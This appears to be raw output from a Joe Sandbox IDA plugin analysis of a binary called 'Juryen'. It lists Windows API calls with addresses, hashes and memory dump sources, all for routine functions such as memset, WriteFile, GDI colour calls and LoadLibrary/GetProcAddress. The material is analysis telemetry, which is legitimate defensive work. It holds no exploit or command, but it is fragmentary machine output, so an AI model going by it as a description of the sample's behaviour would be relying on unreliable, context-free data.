                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402FD7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                    • strlen.MSVCRT ref: 00403006
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                    APIs
                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 764393265-0
                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File$LocalSpecific
                                                                    • String ID:
                                                                    • API String ID: 979780441-0
                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                    APIs
                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                    • String ID:
                                                                    • API String ID: 1386444988-0
                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(02220048), ref: 0044DF01
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977028), ref: 0044DF11
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977838), ref: 0044DF21
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977430), ref: 0044DF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: d=E
                                                                    • API String ID: 909852535-3703654223
                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$memcpywcslen
                                                                    • String ID: "
                                                                    • API String ID: 1983396471-123907689
                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                    • String ID: URL
                                                                    • API String ID: 2108176848-3574463123
                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                    APIs
                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemcpy
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2789212964-323797159
                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf
                                                                    • String ID: %%-%d.%ds
                                                                    • API String ID: 3988819677-2008345750
                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                    APIs
                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                    • memset.MSVCRT ref: 00401917
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PlacementWindowmemset
                                                                    • String ID: WinPos
                                                                    • API String ID: 4036792311-2823255486
                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                    APIs
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 383090722-1948609170
                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                    • API String ID: 2773794195-880857682
                                                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: MZ@
                                                                    • API String ID: 1378638983-2978689999
                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                    APIs
                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040A908
                                                                    • free.MSVCRT ref: 0040A92B
                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                    • Opcode Fuzzy Hash: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                    • free.MSVCRT ref: 0040B201
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B224
